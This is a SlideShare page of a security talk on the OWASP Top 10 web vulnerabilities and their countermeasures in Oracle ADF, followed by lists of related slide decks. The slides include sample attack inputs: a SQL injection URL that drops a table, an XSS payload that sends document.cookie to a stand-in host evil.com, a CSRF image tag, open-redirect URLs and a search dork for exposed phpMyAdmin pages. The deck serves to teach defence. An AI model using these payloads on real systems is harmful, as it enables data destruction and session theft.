SlideShare ist ein Scribd-Unternehmen logo

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

Als PPT, PDF herunterladen
Brian Huff
Brian Huff
Technologie
1 von 36
Top 10 Web Vulnerabilities, and Securing them with ADF Brian “Bex” Huff Chief Software Architect
2 Agenda  Intro  Open Web Application Security Project (OWASP)  Top 10 Web Application Security Vulnerabilities  Countermeasures  References  For the latest version of this presentation, go to SlideShare:  http://slideshare.com/bexmex
Intro  What is OWASP? • http://owasp.org • Worldwide non-profit focused on improving software security • Reaches out to ALL developers: not just security professionals  Who am I? • Oracle ACE Director • Author of 2 books on Oracle Technology • Twitter: @bex  What will you learn? • The top 10 security mistakes that developers make • How to design software with an assurance of security • You don’t need to be a security guru to secure your web apps 3
OWASP Top 10 of 2013 1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Security Misconfiguration 6) Sensitive Data Exposure (NEW) 7) Missing Function Level Access Control (NEW) 8) Cross Site Request Forgery (CSRF) 9) Using Components with Known Vulnerabilities (NEW) 10) Unvalidated Redirects and Forwards 4
1) Injection  Used when your app sends user-supplied data to other apps • Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours • To access unauthorized data, or completely take over remote application  Example: SQL injection attack • String query = "SELECT * FROM products WHERE name='" + request.getParameter("id") +"'";  Code expects a nice parameter in the URL • http://example.com/products?id=123  Hackers could pass this into the URL instead • http://example.com/products?id=';+DROP+TABLE+'products'; 5
Example  Don’t: name your child Robert’); DROP TABLE Students;--  Do: expect SQL Injection 6
Countermeasures  "Connections" between systems are highly vulnerable  Always assume data coming in could be "evil" • Be sure to include "evil" use cases and user stories in your design  Ideally, only allow the user to select among "safe" options • Never allow them to pass data between systems unchecked  If user-input text is needed, use parameterized statements • Clean up quotes, parenthesis, and comments  Use a battle-tested library for protecting your database • ADF prepared statements, OWASP's ESAPI codecs 7
Example // good idea ViewObject studentVO = this.getStudentView(); studentVO.setNamedWhereClauseParam("id", id); // bad idea! ViewObject studentVO = this.getStudentView(); studentVO.setWhereClause("id = " + id); // another bad idea! String query = "select * from students where id=" + id; ViewObject vo = appMod.createViewObjectFromQueryStmt(null,query); 8
ADF Input Validation  Occurs on most components automatically • Additional validate components available for additional filtering • validateLength, validateLongRange, convertDateTime, etc.  Exception: when immediate=true for some components • Can access raw, unfiltered data through managed bean  Hidden fields do not equal secure fields • Expect hackers to tamper with the HTML, and insert their own values • selectOne and selectMany do automatic validation, and are safe  Use caution with custom AJAX layers • Not always subject to ADF input validation 9
2) Broken Authentication and Session Management  HTTP is a "stateless" protocol • Nice and simple: HTTP request, HTTP response • All data must be passed in the request every time  How do we store state? • Client side with cookies • Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL • Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID • packet sniffing -- especially on an open WiFi access point • HttpReferrer logs, if sessionId is in the URL 10
Countermeasures  Assume that a user stole a session ID • Determine how bad this would be in your application  Use SSL everywhere! • Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins • Have a cryptographically strong session ID (ADF default) • Have a reasonable timeout, one hour is fine 11
ADF Countermeasures  Don’t pass the jsessionid in the URL, put it in a cookie • Evil sites can sniff your session ID from their referrer logs • Cookies harder to sniff if SSL is enabled  Sample web.xml snippet <session-descriptor> <cookie-name>MYAPPSESSID</cookie-name> <url-rewriting-enabled>false</url-rewriting-enabled> <timeout-secs>3600</timeout-secs> </session-descriptor> 12
3) Cross Site Scripting (XSS)  Sites must "cleanse" user input before displaying it • HTML tags can be very dangerous • If a user can embed a <SCRIPT> tag, all is lost!  Hackers can create URLs to inject their own HTML onto the page • Can be used to do almost any kind of attack!!!  ADF is mostly safe, but occasionally vulnerable • User generated content is usually HTML encoded on the page • <script> becomes &lt;script&gt; • Use caution with the af:resource or f:verbatim tags • Never pass in unencoded data! 13
Example  Example: JSP to draw HTML based on user input • String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";  Code expects a nice URL: • http://example.com/buy?item=123  But a hacker could supply this URL: • http://example.com/buy?item='><script>document.location=' http://evil.com/steal/'+document.cookie</script>  Then trick an administrator or superuser to go there • Cookie is stolen, and now evil user can connect as the admin! 14
Countermeasures  Never, ever, ever trust user-submitted content!  Properly "escape" any data before displaying it on web pages • JavaScript parameters, URL parameters, STYLE elements • Remove script tags, and possibly anything with a SRC attribute • Done automatically in ADF, but manually if you bypass ADF and write JS • Use ESAPI to "cleanse" HTML before dumping to page  Do not allow state-change from HTTP GET requests • Otherwise, a rogue IMG tag could delete content • No state change on initial ADF page load!  Set the HttpOnly flag in your response headers • Prevents document.cookie from working in JavaScript 15
4) Insecure Direct Object Reference  Assume my project id is 123  I see a link on “My Projects” page that goes here: • http://example.com/projects/123  If I alter the URL, can I see other people’s projects? • http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? • Don't trick yourself into thinking complex URLs are any more secure • Security != Obscurity 16
Countermeasures  Every resource needs a security level • What roles do you need to access certain items? • Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check • What action are you taking, with what resource? • Put it all in one common codebase for simplicity • May need to run check multiple times, for sub-actions and sub-resources • Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Ideally, put all security in the Application Module (model) • Single location to secure multiple views 17
Countermeasures, ctd.  Avoid direct object reference • Use a temporary variable relevant to just that user • Use a cryptographically strong variable  Validate all references, regardless  Validate access to that reference • Read, write, update, delete 18
ADF Global Security Expressions #{securityContext.authenticated} #{securityContext.userName} #{securityContext.userInRole['roleList']} #{securityContext.userInAllRoles['roleList']} #{securityContext.taskflowViewable['target']} #{securityContext.regionViewable['target']} #{securityContext.userGrantedResource['permission']} #{securityContext.userGrantedPermission['permission']} 19
5) Security Misconfiguration  Everything from the OS to the DB to the ADF framework  What if ADF issued a security patch? • Do you have a centralized policy for keeping dependencies up-to-date? • How long would it take you to discover new code? • How long would it take to recompile/test/redeploy?  Do you know all security configurations in the framework? • Odds are no... documentation is usually obtuse • “Being helpful is a security hole”  Have you properly "hardened" your infrastrurcture? • Delete default users, disable unused services and ports • Operating System, WebLogic, Database, MDS 20
Countermeasures  Subscribe to newsletters and blog feeds to get patches • Use automation if possible to verify patches  Do periodic scans to detect misconfiguration / missing patches  Disable ports/services/features unused in production  Disable default users and passwords  Never send stack traces or SQL errors directly to end users  Taking over websites shouldn't be this easy: • http://www.google.com/search? q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin 21
6) Sensitive Data Exposure  All applications store sensitive data • Credit cards, passwords, private health/financial documents  Where does this data get stored? • Database, files, logs, backups, etc.  Where does this data get sent? • Over the web, backup databases, partners, internal emails • JMS queue, web service calls  How are you preventing unauthorized access to all these resources? 22
Storage Layer Countermeasures  If you store secrets, encrypt them! • Use only battle-tested standard encryption algorithms  Analyze possible threats: inside attack, external user • Make sure encryption policy is appropriate for the threats  Encrypt data anywhere it's stored long term • Especially backups! • Store backups of decryption keys separately from data  Restrict access to decrypted data to only authorized users  Hash all passwords with a standard algorithm, and a "salt"  Use strong keys to access the information  Create a password management policy, and stick with it! 23
Sane Pass Phrase Management Policy 24
Transport Layer Countermeasures  Use strong, standards compliant network security protocols • Use TLS (SSL) on all connections with sensitive data  Encrypt messages before transmission • XML-Encryption  Sign messages before transmission • XML-Signature  Disable old, flawed encryption algorithms (ie, SSL 2.0) 25
7) Missing Function Level Access Control  Similar to Insecure Direct Object Reference • Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: • http://example.com/project/123 • http://example.com/user/getProjects/  I could fish around and try other URLs as well: • http://example.com/manager/getProjects/ • http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: • you have front-end security, but not back-end security 26
Countermeasures  Do authentication checks at least twice • Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them • Bad usability • Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed • Do back-end checks for access, and state change  Add even more layers as needed: • Does all security information exist in the URL? • Can you authenticate right away? • Might you need to get half way through the request before you know what rights are needed? • What if the user has access, but their behavior is unusual • should you prompt for password again, or perhaps for additional authorization? 27
8) Cross-Site Request Forgery  Evil sites can hijack your browser, and run secure requests: 1) User logs into secure application behind the firewall http://example.com/myApp 1) User goes to "evil" website, or loads up "evil" HTML email 2) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser • Can browse around your intranet, log into bank accounts • Anything you are currently logged into • Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On 28
Countermeasures  Need a unique token to validate that the request is authentic • The jsessionId is sometimes sufficient, but can be stolen with XSS • More secure: unique token for every HTTP request • If somebody steals your jsessionid, they can only do one request!  Steps to validate every request • Put a random number in the session for the next valid token • Put that token on every HTML web form that causes state change • When processing a request, validate the token • Generate another random token for the next request • Place that token in the session, repeat forever! • NOTE: might not be needed in JSF 2.1  http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html 29
9) Using Components with Known Vulnerabilities  In addition to ADF, you may use other frameworks • Open Source Libraries • OEM Libraries • JavaScript frameworks • JARs and JARs and JARs of fun...  Automated hacker tools can find these dependencies • Unless you are always on the latest stable version, you are vulnerable  All possible attack vectors are open • XSS, injection, CDRF being the most common and most troublesome • Rages from annoying to complete takeover of your servers 30
Countermeasures  At a minimum, manually keep track of dependencies/versions • Developers must justify every JAR they depend on • Must manually keep track of version, and check before each release  Better still, use Maven to perform automated builds • Automatically check your JAR version vs. latest stable release  Both have risks to the build process • What if you have to refactor your code every time the JAR is revised? • Annoying, but a neccessary step to secure your applications 31
10) Unvalidated Redirects and Forwards  Most sites allow redirects to other sites, or pages within the site: • http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: • http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: • http://example.com/redirect?url=/admin.jsp?deleteEverything=true  Sometimes called "phishing holes" 32
ADF Attack Vectors  Common places to do redirects • PagePhaseListener • Download Servlet • Task Flow router  Example code for a redirect: FacesContext fctx = FacesContext.getCurrentInstance(); fctx.getExternalContext().redirect("http://google.com"); 33
Countermeasures  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL • http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL • http://example.com/redirect?url=google.com&hash=a1b2c3  Example: does this URL look like a Google Invoice to you? • http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564  Question: are URL shorteners inherently unsafe? • TinyUrl offers a "preview" feature: others should as well 34
References  OWASP top 10, and associated resources • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  ADF Code guidelines to prevent security holes: • http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf- code-guidelines-v1-00-1845659.pdf  JavaScript best practices for ADF • http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript- 302460.pdf  Hardening Fusion Middleware to avoid OWASP issues: • http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten- application.html  JSF and OWASP • http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications- against-owasp-top-ten-color.pdf 35
36  My Company: http://bezzotech.com  My Blog: http://bexhuff.com  My Slides: http://slideshare.com/bexmex  My Tweets: @bex  My Self: bex@bezzotech.com Questions?

Empfohlen

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Oracle UCM Implementation Patterns
Oracle UCM Implementation PatternsOracle UCM Implementation Patterns
Oracle UCM Implementation PatternsBrian Huff
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themMasoud Kalali
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishMarkus Eisele
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 

Empfohlen

Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Web Hacking
Web HackingWeb Hacking
Web HackingInformation Technology
 
Oracle UCM Implementation Patterns
Oracle UCM Implementation PatternsOracle UCM Implementation Patterns
Oracle UCM Implementation PatternsBrian Huff
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themMasoud Kalali
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsAdeel Javaid
 
Security in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishSecurity in practice with Java EE 6 and GlassFish
Security in practice with Java EE 6 and GlassFishMarkus Eisele
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Brian Huff
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and SecurityBlueinfy Solutions
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Masoud Kalali
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security NinjaPaul Gilzow
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014ColdFusionConference
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?Four Kitchens
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decompositionKaty Anton
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2Jim Manico
 
How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishMarkus Eisele
 

Weitere ähnliche Inhalte

Was ist angesagt?

Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Brian Huff
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and SecurityBlueinfy Solutions
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Masoud Kalali
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security NinjaPaul Gilzow
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decompositionKaty Anton
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2Jim Manico
 

Was ist angesagt? (20)

Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & Countermeasures
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!Deep Dive: Oracle WebCenter Content Tips and Traps!
Deep Dive: Oracle WebCenter Content Tips and Traps!
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
Security vulnerabilities decomposition
Security vulnerabilities decompositionSecurity vulnerabilities decomposition
Security vulnerabilities decomposition
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
 

Ähnlich wie OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a DatabaseJohn Ashmead
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishMarkus Eisele
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Michael Pirnat
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 
Owasp top10salesforce
Owasp top10salesforceOwasp top10salesforce
Owasp top10salesforcegbreavin
 
Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Rafał Hryniewski
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Web security for app developers
Web security for app developersWeb security for app developers
Web security for app developersPablo Gazmuri
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101Niall Merrigan
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdfRavi Aggarwal
 

Ähnlich wie OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF (20)

How to Destroy a Database
How to Destroy a DatabaseHow to Destroy a Database
How to Destroy a Database
 
Java EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
 
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
Shiny, Let’s Be Bad Guys: Exploiting and Mitigating the Top 10 Web App Vulner...
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 
Owasp top10salesforce
Owasp top10salesforceOwasp top10salesforce
Owasp top10salesforce
 
Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC Essential security measures in ASP.NET MVC
Essential security measures in ASP.NET MVC
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Web security for app developers
Web security for app developersWeb security for app developers
Web security for app developers
 
Defensive programing 101
Defensive programing 101Defensive programing 101
Defensive programing 101
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web security
Web securityWeb security
Web security
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 

Mehr von Brian Huff

Top 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersTop 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersBrian Huff
 
Switching to Oracle Document Cloud
Switching to Oracle Document CloudSwitching to Oracle Document Cloud
Switching to Oracle Document CloudBrian Huff
 
AP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenterAP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenterBrian Huff
 
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...Brian Huff
 
Integrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenterIntegrating ADF Mobile with WebCenter
